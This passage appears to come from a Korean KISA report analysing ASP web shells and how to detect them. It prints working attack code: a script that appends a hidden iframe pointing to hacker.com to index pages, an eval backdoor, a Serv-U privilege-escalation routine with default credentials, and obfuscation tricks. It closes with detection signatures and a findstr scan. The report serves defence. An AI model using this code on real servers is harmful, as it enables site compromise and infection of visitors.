◈ 정규 표현식으로 파일이름을 검사하여 메인 페이지를 찾는다. Set regEx=New RegExp regEx.Pattern=”(＼＼|＼/)(default|index|main|admin)\.(htm|html|asp|php|jsp|aspx)＼b” regEx.IgnoreCase=True retVal=regEx.Test(path) ◈ 위 정규 표현식으로 검색된 파일의 끝에 iframe 코드를 삽입한다. Set fs=Server.createObject(“Scripting.FileSystemObject”) Set f=fs.GetFile(path) Set f_addcode=f.OpenAsTextStream(8,-2) // 포인터는 파일 끝으로 이동하고 쓰기 모드로 연다 f_addcode.Write “<IFRAME src="http://hacker.com/m.htm" width=0 height=0></IFRAME>” f_addcode.Close

■ 데이터베이스 열람 및 조작
데이터베이스에 접속하기 위해서는 Adodb.Connection 오브젝트를 사용하고 아래와 같은 메소드를 이용하여 데이터베이스 연결 및 SQL 쿼리 문들을 실행할 수 있다.

Set Con = Server.CreateObject(“Adodb.Connection”) Con.Open “Provider=SQLOLEDB;Data Source=SERVER_NAME;database=DB_NAME;uid=UID;pwd=PWD” SQL = “SELECT * FROM table” Set RS = Con.Execute(SQL)

■ 레지스트리 조작
윈도우는 모든 시스템 구성 정보나 사용자 설정 정보를 레지스트리에 저장한다. 웹쉘에서는 아래와 같은 Wscript.Shell 오브젝트와 관련 메소드를 이용하여 레지스트리 확인 및 조작 한다.

※ 구현 예제 코드 생략
o Wscript.Shell
- RegRead
- RegWrite
- RegDelete
웹쉘에서 참조하는 레지스트리 값들은 아래와 같다.

- 터미널 서비스 포트, PortNumber 키 값 변경 HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\ - 윈도우 자동으로 로그인 키 값(autoadminlogon)이 설정되어 있는 경우 디폴트 사용자 이름 (DefaultUserName)과 패스워드(DefaultPassword)를 확인 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ - 컴퓨터 이름 확인 HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName - 익명 사용자 접속 여부 및 공유 정보 확인 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSha redNetDrives - 보안 필터링 및 포워딩 여부 확인 HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter - 네트워크 카드 정보 확인 HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128 -8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind

■ 시스템 정보 확인
웹쉘에서 GetObject 메소드를 이용해 서비스와 사용자 장보를 확인 한다.

o 서비스 확인

Set ComputerObj = GetObject(“WinNT://MYCOMPUTER”) ComputerObj.Filter = Array(“Service”) For Each Service in ComputerObj WScript.Echo “Service display name = “ & Service.DisplayName WScript.Echo “Service account name = “ & Service.ServiceAccountName WScript.Echo “Service executable = “ & Service.Path WScript.Echo “Current status = “ & Service.Status Next

o 사용자 정보확인

Set objComputer = GetObject(“WinNT://.”) objComputer.Filter = Array(“User”) For Each objUser in objComputer WScript.Echo objUser.Name Next

■ 어플리케이션 취약점을 통한 로컬 권한상승

웹에서 실행되는 모든 파일들은 기본적으로 인터넷 게스트 계정으로 으로 실행된다. 웹쉘은 이러한 제한된 권한을 관리자 권한으로 상승시키기 위해 취약점 있는 Serv-U 프로그램을 이용한다.
Serv-U 3.x ~ 5.x는 로컬 권한 상승 취약점이 있으며 이를 이용하여 새로운 관리자 계정을 생성할 수 있다. 취약점을 공격하는 과정은 아래와 같다.

o Serv-U 3.x ~ 5.x 버전의 ServUDaemon.exe 다운로드 및 실행 (TzoLibr.dll 필요)
o Serv-U 디폴트 아이피/포트(127.0.0.1/43958) 로 접속 후
o Serv-U 디폴트 관리 아이디/패스워드로 로그인
- USER LocalAdministrator (디폴트 아이디)
- PASS #l@$ak#.lk;0@P (디폴트 패스워드)
o Serv-U에 신규 도메인 생성
o Serv-U 명령어 실행에 필요한 Serv-U 사용자 추가
o “SITE EXEC“ Serv-U 내부 스크립트를 통한 시스템 명령어 수행

set a=Server.CreateObject(“Microsoft.XMLHTTP”) a.open “GET”, “http://127.0.0.1:” & port & “/goldsun/upadmin/s1”,True, “”, “” a.send loginuser & loginpass & “SITE MAINTENANCE” & deldomain & newdomain & newuser & quit set session(“a”)=a set b=Server.CreateObject(“Microsoft.XMLHTTP”) b.open “GET”, “http://127.0.0.1:” & ftpport & “/goldsun/upadmin/s2”, True, “”, “” b.send “User go” & vbCrLf & “pass od” & vbCrLf & “SITE EXEC “ & cmd & vbCrLf & quit set session(“b”)=b

나. 스크립트 인코딩
마이크로소프트社의 윈도우 스크립트는 Script Encoder를 제공하여 일반 사용자들이 스크립트 내용을 확인하는게 쉽지 않도록 하고 있다. 하지만 웹쉘을 업로드한 공격자가 이러한 기능을 악용하여 관리자가 웹쉘을 쉽게 찾지 못하도록 백신탐지를 우회 하는데 이용하고 있다.

http://msdn2.microsoft.com/en-us/library/cbfz3598(VS.85).aspx

Script Encoder는 콘솔모드에서 명령어 라인으로 실행되며 다음과 같이 사용한다.

SCRENC [switches] inputfile outputfile

일반 asp 스크립트를 인코딩 하면 아래와 같은 결과가 된다.

일반 소스	인코딩 소스
<SCRIPT language=”VBScript”> <% This is test %> </SCRIPT>	<%@ LANGUAGE = VBScript.Encode %> <SCRIPT language=”VBScript”> <%#@~^FAAAAA==@#@&K4b/,k/,Y dY @#@&ogQAAA==^#~@%> </SCRIPT>

<SCRIPT language=”vbscript” runat="”server”"> If Request(“asdf”)<>”” Then Session(“조직킬러”)=Request(“asdf”) If Session(“조직킬러”)<>”” Then Execute(Session(“조직킬러”)) </SCRIPT>

라. 기타

■ 문자열 분리를 이용한 탐지 우회 기능
최근 바이러스 백신이나 서버 관리자들이 웹쉘 시그니쳐를 통해 웹쉘 탐지가 많아지자 공격자 들은 시그니쳐로 이용되는 문자열(오브젝트 명)들을 분산시켜 탐지를 우회하고 있다.

- Shell.Application
문자열을 연결하는 & 연산자를 이용하고 값이 주어지지 않은 변수 x를 이용해 아래와 같이
Shell.Application 문자열을 분리한다.
Set sa = Server.CreateObject“( She”&x&”ll.Appl”&x&”ication”)
“She”&x&”ll.Appl”&x&”ication”=>“ Shell.Application”
- WScript.Shell
Set ws = Server.CreateObject“( WScr”&x&”ipt.Shell”)

■ 파일 생성 웹쉘
Scripting.FileSystemObject 오브젝트를 이용하여 새로운 파일을 생성하는 기능을 앞서 살펴 보았다. 최근 정상적인 스크립트들에서도 사용하는 CreateTextFile, Write 메소드를 이용하여 단지 파일만 생성하는 웹쉘들이 증가하고 있다. 이러한 웹쉘은 정상적인 스크립트에서 사용하는 오브젝트와 메소드를 사용하므로 탐지하기가 쉽지 않다. 또한 이러한 웹쉘들은 앞서 설명한 다양한 기능을 가지는 웹쉘을 얼마든지 생성할 수가 있어 관리자들의 주의가 필요하다.

cmd\.exe	Wscript\.Shell	Shell\.Application	VBScript\.Encode	gb2312
execute *\(? *session	execute *\(? *request	eval *\(? *request	＼.run.*>	\.exec *\(
webshell	lake2	hack520	lcxMarcos	Marcos

■ findstr 명령어를 활용한 탐지 방법
findstr 이라는 명령어는 지정된 파일들에서 찾고자 하는 특정 문자열들을 검색할 수 있도록 도와준다. 위에서 정의된 시그니쳐들을 파일(asp.sig)로 지정하고 사이트 홈 디렉터리에서 아 래의 예처럼 실행해 보기 바란다.

findstr /i /r /s /g:asp.sig *.asp

- i : 대소문자 구분없이 검색
- g : 지정된 파일에서 검색 문자열을 받음
- r : 정규 표현식 사용
- s : 모든 하위디렉터리 검색

※ 최근 공격자들이 웹쉘 확장자를 .cer, .asa, cdx, hta로 변경하여 파일을 업로드 하는 경우가 있다.(파일 업로드
우회 공격) 반드시 검사 확장자를 asp 뿐만 아니라 스크립트로 실행되도록 지정된 .asa, .cer 등도 반드시 함께
검색 하도록 해야 한다.

Action=MainMenu Action=Show1File Action=EditFile Action=DbManager Action=getTerminalInfo Action=ServerInfo Action=Servu Action=kmuma Action=kmuma&act=scan Action=Cplgm&M=2 Action=plgm Action=PageAddToMdb > Action=ReadREG Action=ScanPort Action=Cmd1Shell Action=UpFile (pageName|id|list|action|act)=ServiceList (pageName|id|list|action|act)=ServiceList (pageName|id|list|action|act)=infoAboutSrv (pageName|id|list|action|act)=objOnSrv (pageName|id|list|action|act)=userList (pageName|id|list|action|act)=WsCmdRun (pageName|id|list|action|act)=SaCmdRun (pageName|id|list|action|act)=SaCmdRun&theAct (pageName|id|list|action|act)=FsoFileExplorer (pageName|id|list|action|act)=FsoFileExplorer&theAct (pageName|id|list|action|act)=FsoFileExplorer&thePath pageName=MsDataBase pageName=MsDataBase&theAct=showTables pageName=TxtSearcher pageName=OtherTools act=scan Action=mainwin action=listtb action=listvw action=listdb action=execsql action=dbsrcbox action=searchfile action=xpcmdshell (action|act)=cmdshell action=mainmenu action=showfile action=editfile action=course action=serverinfo action=upfile action=dbmanager ex=edit&pth= PageName=PageUpload&theAct PageName=PageWebProxy&url= productName=HigroupASPAdmin PageWebProxy aCTiON=cMd aCTiON=ClonETiMe&SrC= aCTiON=SqLrOotKIt aCTiON=Reg aCTiON=DAtA aCTiON=Goto&SrC=C:\ aCTiON=uPFIlE&SrC= aCTiON=NEw&SrC= act=info act=filemanage act=edit&src= act=del&src= act=rename&src= DirName= Type=.*FileName=.*\ Type=.*ok=dir FsoFileExplorer WsCmdRun SaCmdRun MsDataBase HigroupASPAdmin =cmd ClonETiMe SqLrOotKIt

4. 결론
관리하는 서버에서 웹쉘이 탐지되었다면 시스템에 웹쉘을 생성할 수 있었던 취약점이 존재 할 것 이다. 웹쉘이 업로드 된 피해시스템을 분석한 결과 대부분 파일 업로드, SQL Injection과 같은 어플리케이션 취약점으로 웹쉘이 생성되는 것으로 확인되었다. 웹쉘을 탐지해서 제거하는 것도 중요하지만 웹쉘을 생성할 수 있었던 근본적인 취약점을 찾아내어 패치하는 것도 관리자들이 꼭~! 잊지 않고 해야 될 작업일 것이다.
앞서 탐지 방법에서 제공한 시그니쳐들은 오탐이 발생할 수 있으므로 반드시 이 보고서에서 설명한 기능을 갖는 웹쉘인지 확인 후 삭제해야 한다.

[자료: 한국정보보호진흥원(KISA)]